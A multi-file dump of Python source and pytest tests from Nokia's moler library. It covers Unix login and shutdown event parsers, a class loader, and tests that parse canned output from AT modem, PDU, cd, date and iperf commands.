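```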
#### File: events/unix/genericunix_textualevent.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import abc
import six
from moler.events.textualevent import TextualEvent
from moler.helpers import remove_all_known_special_chars
@six.add_metaclass(abc.ABCMeta)
class GenericUnixTextualEvent(TextualEvent):
def _decode_line(self, line):
"""
Decodes line if necessary. Put here code to remove colors from terminal etc.
:param line: line from device to decode.
:return: decoded line.
"""
line = remove_all_known_special_chars(line)
return line
```
#### File: events/unix/last_failed_login.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import datetime
import re
from moler.events.unix.last_login import LastLogin
class LastFailedLogin(LastLogin):
# Last failed login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
_re_last_login = re.compile(r'Last failed login:\s+(?P<DATE>\S.*\S)\s+from\s+(?P<HOST>\S+)', re.I)
def _get_re_line(self):
"""
Returns regex object with groups: DATE and HOST.
:return: regex object with groups: DATE and HOST.
"""
return LastFailedLogin._re_last_login
EVENT_OUTPUT = """
Last failed login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
"""
EVENT_KWARGS = {
"till_occurs_times": 1
}
EVENT_RESULT = [
{
'time': datetime.datetime(2019, 1, 14, 13, 12, 48),
'host': '127.0.0.1',
'date_raw': 'Tue Jun 12 08:54:44 2018',
'date': datetime.datetime(2018, 6, 12, 8, 54, 44),
}
]
```
#### File: events/unix/last_login.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>'
import datetime
import re
from dateutil import parser
from moler.events.unix.genericunix_textualevent import GenericUnixTextualEvent
from moler.exceptions import ParsingDone
class LastLogin(GenericUnixTextualEvent):
def __init__(self, connection, till_occurs_times=-1, runner=None):
"""
Event for 'Last login ... from ...'
:param connection: moler connection to device, terminal when command is executed
        :param till_occurs_times: number of event occurrences
:param runner: Runner to run event
"""
super(LastLogin, self).__init__(connection=connection, runner=runner, till_occurs_times=till_occurs_times)
self.current_ret = dict()
self._re_line = self._get_re_line()
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
try:
self._parse_last_login(line=line)
except ParsingDone:
pass
# Last login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
_re_last_login = re.compile(r'Last login:\s+(?P<DATE>\S.*\S)\s+from\s+(?P<HOST>\S+)', re.I)
def _parse_last_login(self, line):
"""
Parses line and tries to find date and host.
:param line: Line from device.
:return: None
:raise: ParsingDone if regex matches the line.
"""
if self._regex_helper.search(self._re_line, line):
self.current_ret["time"] = self._last_recv_time_data_read_from_connection
self.current_ret["host"] = self._regex_helper.group("HOST")
date_str = self._regex_helper.group("DATE")
self.current_ret["date_raw"] = date_str
self.current_ret["date"] = parser.parse(date_str)
self.event_occurred(event_data=self.current_ret)
self.current_ret = dict()
raise ParsingDone()
def _get_re_line(self):
"""
Returns regex object with groups: DATE and HOST.
:return: regex object with groups: DATE and HOST.
"""
return LastLogin._re_last_login
EVENT_OUTPUT = """
Last login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
"""
EVENT_KWARGS = {
"till_occurs_times": 1
}
EVENT_RESULT = [
{
'time': datetime.datetime(2019, 1, 14, 13, 12, 48),
'host': '127.0.0.1',
'date_raw': 'Tue Jun 12 08:54:44 2018',
'date': datetime.datetime(2018, 6, 12, 8, 54, 44),
}
]
```
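The `_re_last_login` pattern above exposes two named groups, `DATE` and `HOST`, and `_parse_last_login()` hands the raw date string to `dateutil.parser.parse()`. A small standalone sketch of that parsing step (it assumes `python-dateutil` is installed, just as the event itself does):

```python
import re
from dateutil import parser

_re_last_login = re.compile(r'Last login:\s+(?P<DATE>\S.*\S)\s+from\s+(?P<HOST>\S+)', re.I)

line = "Last login: Tue Jun 12 08:54:44 2018 from 127.0.0.1"
match = _re_last_login.search(line)
if match:
    date_raw = match.group("DATE")  # 'Tue Jun 12 08:54:44 2018'
    host = match.group("HOST")      # '127.0.0.1'
    date = parser.parse(date_raw)   # datetime.datetime(2018, 6, 12, 8, 54, 44)
    print(host, date.isoformat())
```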
#### File: events/unix/shutdown.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import datetime
from moler.events.unix.genericunix_lineevent import GenericUnixLineEvent
class Shutdown(GenericUnixLineEvent):
def __init__(self, connection, till_occurs_times=-1, runner=None):
"""
Event detecting system shutdown.
:param connection: moler connection to device, terminal when command is executed
:param till_occurs_times: number of event occurrences
:param runner: Runner to run event
"""
super(Shutdown, self).__init__(connection=connection, runner=runner, till_occurs_times=till_occurs_times,
detect_patterns=[r"system is going down for (\w+) at (.+)"])
EVENT_OUTPUT_SIMPLE = """
The system is going down for reboot at Tue 2019-03-19 12:15:16 CET!
"""
EVENT_KWARGS_SIMPLE = {
"till_occurs_times": 1
}
EVENT_RESULT_SIMPLE = [
{
'line': 'The system is going down for reboot at Tue 2019-03-19 12:15:16 CET!',
"groups": (u'reboot', u'Tue 2019-03-19 12:15:16 CET!'),
"named_groups": {},
"matched": "system is going down for reboot at Tue 2019-03-19 12:15:16 CET!",
'time': datetime.datetime.now()
}
]
```
#### File: moler/moler/instance_loader.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import importlib
# ------------------------------------ public API
def create_instance_from_class_fullname(class_fullname, constructor_parameters):
"""
Factory method that creates class instance object according to its definition given in parameters.
:param class_fullname: full name of class in dotted notation like 'package1.module1.ClassName1'
:param constructor_parameters: to be passed into instance constructor
:return: instance of requested class
"""
class_object = load_class_from_class_fullname(class_fullname)
class_instance = create_class_instance(class_object, constructor_parameters)
return class_instance
def load_class_from_class_fullname(class_fullname):
"""
Factory method that loads class object according to its fullname.
:param class_fullname: full name of class in dotted notation like 'package1.module1.ClassName1'
:return: requested class object
"""
class_module_name, class_name = _split_to_module_and_class_name(class_fullname)
class_object = _load_class(module_name=class_module_name, class_name=class_name)
return class_object
def create_class_instance(class_object, constructor_params):
"""
Factory method that creates class instance object according to its definition given in parameters.
:param class_object: class object to be instantiated
    :param constructor_params: to be passed into instance constructor
:return: instance of requested class
"""
try:
class_instance = class_object(**constructor_params)
return class_instance
except TypeError as err:
raise TypeError("Creating '%s' instance: %s" % (class_object, str(err)))
# ------------------------------------ implementation
def _split_to_module_and_class_name(class_fullname):
class_split = class_fullname.split('.')
module_list = class_split[0:-1]
module = '.'.join(module_list)
class_name = class_split[-1]
return module, class_name
def _load_class(module_name, class_name):
module = _import_module(module_name)
class_object = _import_class_from_module(module, class_name)
return class_object
def _import_module(module_name):
try:
module_of_class = importlib.import_module(module_name)
return module_of_class
except ImportError as err:
raise ImportError("Could not import '{}' module ({}). Please make sure "
"import path is correct.".format(module_name, str(err)))
def _import_class_from_module(module, class_name):
try:
module_attribute = getattr(module, class_name)
if isinstance(module_attribute, type):
class_object = module_attribute
return class_object
else:
raise TypeError("Module's '%s' attribute '%s' is not class (it is %s)." % (module,
class_name,
type(module_attribute)))
except AttributeError:
raise AttributeError("Module '%s' has no attribute '%s'" % (module, class_name))
```
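A short usage sketch of the loader above. A standard-library class stands in for a real dotted class fullname taken from configuration, so the example stays self-contained:

```python
from moler.instance_loader import create_instance_from_class_fullname

# 'datetime.timedelta' is only a stand-in for a configured 'package.module.ClassName'.
delta = create_instance_from_class_fullname(class_fullname='datetime.timedelta',
                                            constructor_parameters={'seconds': 90})
print(delta)  # -> 0:01:30

# Wrong constructor parameters surface as TypeError from create_class_instance():
try:
    create_instance_from_class_fullname('datetime.timedelta', {'no_such_arg': 1})
except TypeError as err:
    print(err)
```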
#### File: cmd/at/test_cmd_at_attach.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
def test_at_cmd_attach_has_default_timeout_180sec(buffer_connection):
from moler.cmd.at import attach
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
assert at_cmd_attach.timeout == 180
def test_calling_at_cmd_attach_timeouts_after_500ms(buffer_connection):
from moler.cmd.at import attach
from moler.exceptions import CommandTimeout
import time
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
buffer_connection.remote_inject_response(["AT+CGATT=1\n"])
start_time = time.time()
with pytest.raises(CommandTimeout):
at_cmd_attach()
duration = time.time() - start_time
assert duration > 0.5
assert duration < 0.7
def test_calling_at_cmd_attach_timeouts_on_no_output(buffer_connection):
from moler.cmd.at import attach
from moler.exceptions import CommandTimeout
import time
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
start_time = time.time()
with pytest.raises(CommandTimeout):
at_cmd_attach()
duration = time.time() - start_time
assert duration > 0.5
assert duration < 0.7
def test_calling_at_cmd_attach_returns_expected_result(buffer_connection):
from moler.cmd.at import attach
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
buffer_connection.remote_inject_response([attach.COMMAND_OUTPUT_ver_execute])
result = at_cmd_attach()
assert result == attach.COMMAND_RESULT_ver_execute
def test_calling_at_cmd_attach_fails_on_erroneous_output(buffer_connection):
from moler.cmd.at import attach
from moler.exceptions import CommandFailure
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
buffer_connection.remote_inject_response(["AT+CGATT=1\nERROR\n"])
with pytest.raises(CommandFailure):
at_cmd_attach()
```
#### File: cmd/at/test_cmd_at_check_attach_state.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
# --------------------------- testing base class ---------------------------
def test_calling_at_cmd_get_attach_state_returns_expected_result(buffer_connection):
from moler.cmd.at import get_attach_state
at_cmd_get_attach_state = get_attach_state.GetAttachState(connection=buffer_connection.moler_connection)
at_cmd_get_attach_state.timeout = 0.5
buffer_connection.remote_inject_response([get_attach_state.COMMAND_OUTPUT_ver_attached])
result = at_cmd_get_attach_state()
assert result == get_attach_state.COMMAND_RESULT_ver_attached
at_cmd_get_attach_state = get_attach_state.GetAttachState(connection=buffer_connection.moler_connection)
at_cmd_get_attach_state.timeout = 0.5
buffer_connection.remote_inject_response([get_attach_state.COMMAND_OUTPUT_ver_detached])
result = at_cmd_get_attach_state()
assert result == get_attach_state.COMMAND_RESULT_ver_detached
def test_calling_at_cmd_get_attach_state_fails_on_erroneous_output(buffer_connection):
from moler.cmd.at import get_attach_state
from moler.exceptions import CommandFailure
at_cmd_get_attach_state = get_attach_state.GetAttachState(connection=buffer_connection.moler_connection)
at_cmd_get_attach_state.timeout = 0.5
buffer_connection.remote_inject_response(["AT+CGATT?\nERROR\n"])
with pytest.raises(CommandFailure):
at_cmd_get_attach_state()
```
#### File: cmd/at/test_cmd_at_get_imsi.py
```python
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
def test_calling_at_cmd_get_imsi_returns_expected_result(buffer_connection):
from moler.cmd.at import get_imsi
at_cmd_get_imsi = get_imsi.GetImsi(connection=buffer_connection.moler_connection,
**get_imsi.COMMAND_KWARGS_ver_execute)
buffer_connection.remote_inject_response([get_imsi.COMMAND_OUTPUT_ver_execute])
result = at_cmd_get_imsi()
assert result == get_imsi.COMMAND_RESULT_ver_execute
```
#### File: cmd/at/test_cmd_at_get_manufacturer_id.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
def test_calling_at_cmd_get_manufacturer_id_returns_expected_result(buffer_connection):
from moler.cmd.at import get_manufacturer_id
at_cmd_get_imsi = get_manufacturer_id.GetManufacturerId(connection=buffer_connection.moler_connection)
buffer_connection.remote_inject_response([get_manufacturer_id.COMMAND_OUTPUT_ver_execute])
result = at_cmd_get_imsi()
assert result == get_manufacturer_id.COMMAND_RESULT_ver_execute
```
#### File: cmd/pdu_aten/test_cmd_read_status.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.exceptions import CommandFailure
from moler.cmd.pdu_aten.pdu.read_status import ReadStatus
def test_read_status_command_string(buffer_connection):
expected_command_string = "read status o01 format"
cmd = ReadStatus(connection=buffer_connection.moler_connection, outlet="o01", output_format="format")
assert cmd.command_string == expected_command_string
def test_read_status_failure(buffer_connection, command_output):
buffer_connection.remote_inject_response([command_output])
expected_command_string = "read status o01 wrong_format"
cmd = ReadStatus(connection=buffer_connection.moler_connection, outlet="o01", output_format="wrong_format")
assert cmd.command_string == expected_command_string
with pytest.raises(CommandFailure):
cmd()
@pytest.fixture
def command_output():
data = """read status o01 wrong_format
Invalid command or exceed max command length
>"""
return data
```
#### File: cmd/unix/test_cmd_cd.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>'
import pytest
import datetime
from moler.util.moler_test import MolerTest
from moler.exceptions import CommandFailure
def test_calling_cd_returns_result_parsed_from_command_output(buffer_connection, command_output_and_expected_result):
from moler.cmd.unix.cd import Cd
command_output, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response([command_output])
cd_cmd = Cd(connection=buffer_connection.moler_connection, path="/home/user/")
result = cd_cmd()
assert result == expected_result
def test_cd_returns_proper_command_string(buffer_connection):
from moler.cmd.unix.cd import Cd
cd_cmd = Cd(connection=buffer_connection.moler_connection, path="/home/user/")
assert "cd /home/user/" == cd_cmd.command_string
def test_command_unicode_error(buffer_connection, command_output_and_expected_result):
command_output, expected_result = command_output_and_expected_result
from moler.cmd.unix.cd import Cd
sleep_time = 0.1
class CdUnicodeError(Cd):
def __init__(self, *args, **kwargs):
self.raise_unicode = True
self.nr = 0
super(CdUnicodeError, self).__init__(*args, **kwargs)
def on_new_line(self, line, is_full_line):
if self.raise_unicode:
self.nr += 1
exc = UnicodeDecodeError("utf-8", b'abcdef', 0, 1, "Unknown")
raise exc
super(CdUnicodeError, self).on_new_line(line, is_full_line)
cmd = CdUnicodeError(connection=buffer_connection.moler_connection, path="/home/user/")
cmd_start_string = "{}\n".format(cmd.command_string)
cmd.start()
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(cmd_start_string.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd._ignore_unicode_errors = False
cmd.raise_unicode = True
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received("abc".encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd.raise_unicode = False
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(command_output.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
with pytest.raises(CommandFailure):
cmd.await_done()
cmd = CdUnicodeError(connection=buffer_connection.moler_connection, path="/home/user/")
cmd.start()
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(cmd_start_string.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd._ignore_unicode_errors = True
cmd.raise_unicode = True
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received("abc".encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd.raise_unicode = False
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(command_output.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd.await_done()
@pytest.fixture
def command_output_and_expected_result():
data = """
host:~ # cd /home/user/
host:/home/user #
"""
result = {
}
return data, result
```
#### File: cmd/unix/test_cmd_date.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import pytest
def test_calling_date_returns_result_parsed_from_command_output(buffer_connection, command_output_and_expected_result):
from moler.cmd.unix.date import Date
command_output, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response([command_output])
date_cmd = Date(connection=buffer_connection.moler_connection)
result = date_cmd()
assert result == expected_result
@pytest.fixture
def command_output_and_expected_result():
data = """
user@host:~> date '+DATE:%t%t%d-%m-%Y%nTIME:%t%t%H:%M:%S%nZONE:%t%t%z %Z%nEPOCH:%t%t%s%nWEEK_NUMBER:%t%-V%nDAY_OF_YEAR:%t%-j%nDAY_OF_WEEK:%t%u (%A)%nMONTH:%t%t%-m (%B)'
DATE: 14-03-2018
TIME: 14:38:18
ZONE: +0100 CET
EPOCH: 1521034698
WEEK_NUMBER: 11
DAY_OF_YEAR: 73
DAY_OF_WEEK: 3 (Wednesday)
MONTH: 3 (March)
user@host:~>"""
result = {
'DATE': {
'FULL': '14-03-2018',
'YEAR': '2018',
'MONTH': '03',
'DAY': '14'
},
'DAY_NAME': 'Wednesday',
'DAY_OF_YEAR': 73,
'DAY_OF_MONTH': 14,
'DAY_OF_WEEK': 3,
'EPOCH': 1521034698,
'MONTH_NAME': 'March',
'MONTH_NUMBER': 3,
'TIME': {
'FULL': '14:38:18',
'MINUTE': '38',
'HOUR': '14',
'SECOND': '18',
},
'WEEK_NUMBER': 11,
'ZONE': {
'FULL': '+0100 CET',
'SIGN': '+',
'HOUR': '01',
'MINUTE': '00',
'NAME': 'CET'
}
}
return data, result
```
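The fixture above pairs the labelled output of a custom `date` format string with the nested dictionary the `Date` command is expected to return. Below is a simplified sketch of the first parsing step, splitting the labelled lines into raw key/value pairs (an illustration only; the real `moler.cmd.unix.date.Date` command additionally breaks composite fields such as `DATE` and `ZONE` into sub-dictionaries and converts numbers):

```python
output = """DATE: 14-03-2018
TIME: 14:38:18
ZONE: +0100 CET
EPOCH: 1521034698
WEEK_NUMBER: 11
DAY_OF_YEAR: 73
DAY_OF_WEEK: 3 (Wednesday)
MONTH: 3 (March)"""

raw = {}
for line in output.splitlines():
    key, _, value = line.partition(":")
    raw[key.strip()] = value.strip()

print(raw["DATE"])         # '14-03-2018'    -> later split into YEAR / MONTH / DAY
print(raw["DAY_OF_WEEK"])  # '3 (Wednesday)' -> number plus DAY_NAME
```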
#### File: cmd/unix/test_cmd_iperf2.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import pytest
import mock
from moler.cmd.unix.iperf2 import Iperf2
from moler.exceptions import CommandFailure
def test_iperf_returns_proper_command_string(buffer_connection):
iperf_cmd = Iperf2(buffer_connection, options='-c 10.1.1.1 -M 1300 -m')
assert "iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
def test_iperf_can_set_direct_path_to_command_executable(buffer_connection):
iperf_cmd = Iperf2(buffer_connection, options='-c 10.1.1.1 -M 1300 -m')
assert "iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
iperf_cmd.command_path = 'adb shell /data/data/com.magicandroidapps.iperf/bin/'
assert "adb shell /data/data/com.magicandroidapps.iperf/bin/iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
def test_iperf_raise_error_on_bind_failed(buffer_connection, command_output_and_expected_result_on_bind_failed):
iperf_cmd = Iperf2(connection=buffer_connection.moler_connection, options='-s')
command_output, expected_result = command_output_and_expected_result_on_bind_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -s' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_no_such_file(buffer_connection, command_output_and_expected_result_on_connect_failed):
iperf_cmd = Iperf2(connection=buffer_connection.moler_connection, options='-c 10.156.236.132')
command_output, expected_result = command_output_and_expected_result_on_connect_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -c 10.156.236.132' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_iperf_problem(buffer_connection, command_output_and_expected_result_on_iperf_problem):
iperf_cmd = Iperf2(connection=buffer_connection.moler_connection, options='-i')
command_output, expected_result = command_output_and_expected_result_on_iperf_problem
buffer_connection.remote_inject_response([command_output])
assert 'iperf -i' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_unsupported_options_combination(buffer_connection):
with pytest.raises(AttributeError) as err:
Iperf2(connection=buffer_connection.moler_connection, options='-d -P 10')
assert "Unsupported options combination (--dualtest & --parallel)" in str(err.value)
def test_iperf_stores_connections_as_host_port_tuple_for_local_and_remote(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
# local port@host remote port@host
assert len(stored_connections) == 4
assert ('[email protected]', '[email protected]') in stored_connections
assert ('[email protected]', '[email protected]') in stored_connections
assert ('192.168.0.10', '[email protected]') in stored_connections
assert ('192.168.0.12', '[email protected]') in stored_connections
def test_iperf_stores_connections_as_port_at_host_tuple_for_local_and_remote(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
    # local port@host    remote port@host
assert len(stored_connections) == 4
assert ('[email protected]', '[email protected]') in stored_connections
assert ('[email protected]', '[email protected]') in stored_connections
assert ('192.168.0.10', '[email protected]') in stored_connections
assert ('192.168.0.12', '[email protected]') in stored_connections
def test_iperf_stores_ipv6_connections_as_port_at_host_tuple_for_local_and_remote(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_tcp_ipv6_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_tcp_ipv6_client)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
# local port@host remote port@host
assert len(stored_connections) == 2
assert ("49597@fd00::2:0", "5901@fd00::1:0") in stored_connections
assert ("fd00::2:0", "5901@fd00::1:0") in stored_connections
def test_iperf_creates_summary_connection_for_parallel_testing(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
    # local port@host    remote port@host
assert len(stored_connections) == 22
assert ('[email protected]', '[email protected]') in stored_connections # summary
assert ('192.168.0.102', '[email protected]') in stored_connections # result
def test_iperf_ignores_multiple_echo_of_command(buffer_connection):
# running on cygwin may cause getting multiple echo even mixed with prompt
from moler.cmd.unix import iperf2
collected_lines = []
output_with_multiple_echo = "andromeda:/ # /bin/iperf -c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 --dualtest\n" + \
"/bin/iperf -c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 -\n" + \
"andromeda:/ # /bin/iperf -c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 --dualtest\n" + \
"------------------------------------------------------------\n" + \
"[ 3] local 192.168.0.1 port 49597 connected with 1.2.3.4 port 5001\n" + \
"[ ID] Interval Transfer Bandwidth\n" + \
"[ 3] 0.0- 1.0 sec 28.6 MBytes 240 Mbits/sec\n" + \
"[ 3] 0.0-10.0 sec 265 MBytes 222 Mbits/sec\n"+ \
"andromeda:/ # "
buffer_connection.remote_inject_response([output_with_multiple_echo])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
prompt='andromeda:/ # ',
options='-c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 --dualtest')
iperf_cmd.command_path = '/bin/'
oryg_on_new_line = iperf_cmd.__class__.on_new_line
def on_new_line(self, line, is_full_line):
collected_lines.append(line)
oryg_on_new_line(self, line, is_full_line)
with mock.patch.object(iperf_cmd.__class__, "on_new_line", on_new_line):
iperf_cmd()
assert "andromeda:/ # /bin/iperf -c 172.16.17.32 -p 5001 -f k -i 1.0 -t 6.0 --dualtest" not in collected_lines
def test_iperf_correctly_parses_bidirectional_udp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_client)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_bidirectional_udp_client
def test_iperf_correctly_parses_bidirectional_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_bidirectional_udp_server
def test_iperf_correctly_parses_basic_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_basic_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_basic_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_basic_server
def test_iperf_correctly_parses_basic_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_basic_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_basic_client)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_basic_client
def test_iperf_correctly_parses_tcp_ipv6_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_tcp_ipv6_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_tcp_ipv6_client)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_tcp_ipv6_client
def test_iperf_correctly_parses_tcp_ipv6_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_tcp_ipv6_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_tcp_ipv6_server)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_tcp_ipv6_server
def test_iperf_correctly_parses_multiconnection_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections
def test_iperf_correctly_parses_multiconnection_tcp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_server
def test_iperf_server_detects_all_multiport_records_of_interval(buffer_connection):
from moler.cmd.unix import iperf2
from moler.exceptions import ParsingDone
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
client_connection_lines = [
"[ 1] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51914",
"[ 2] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51915",
"[ 3] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51916",
]
for line in client_connection_lines:
try:
iperf_cmd._parse_connection_name_and_id(line)
except ParsingDone:
pass
parallel_client_1 = ('[email protected]', '[email protected]')
parallel_client_2 = ('[email protected]', '[email protected]')
parallel_client_3 = ('[email protected]', '[email protected]')
single_record = {'Lost_Datagrams_ratio': '0%',
'Jitter': '1.2 ms',
'Transfer': 123904,
'Interval': (0.0, 1.0),
'Transfer Raw': '121 KBytes',
'Bandwidth': 123500,
'Lost_vs_Total_Datagrams': (0, 84),
'Bandwidth Raw': '988 Kbits/sec'}
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_1] = [single_record]
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_2] = [single_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_2) is False
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_3] = [single_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_3) is True
second_record = dict(single_record)
second_record['Interval'] = (1.0, 2.0)
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_1] = [second_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_1) is False
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_2] = [second_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_2) is False
